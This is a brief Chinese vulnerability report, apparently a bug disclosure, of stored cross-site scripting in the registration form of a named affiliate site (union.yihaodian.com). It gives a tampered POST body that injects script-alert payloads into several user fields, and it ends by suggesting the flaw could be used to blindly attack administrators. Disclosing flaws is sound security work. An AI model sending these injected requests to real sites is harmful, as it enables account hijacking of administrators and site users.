1.是这个站点啦！1号点网站联盟，貌似很牛B的样子
http://union.yihaodian.com

2.在填写基本信息这里可以插入任何特殊字符，不过客户端还是有一定的判断的，看图啦！

3.但是一切客户端的过滤都是纸老虎啦！

4.将上面post的参数值给改掉啦：
user.email=<script>alert(1)</script>&user.name=<script>alert(1)</script>&user.identityCard=<script>alert(2)</script>&user.mobile=<script>alert(3)</script>&user.phone=<script>alert(4)</script>&user.siteURl=<script>alert(5)</script>&user.siteName=<script>alert(6)</script>&user.trackerU=102826697&user.siteType=1
5.查看返回信息，就截四个图吧：

修复方案：

这个地方XSS似乎是有实际用途的吧，比如盲打管理员什么的！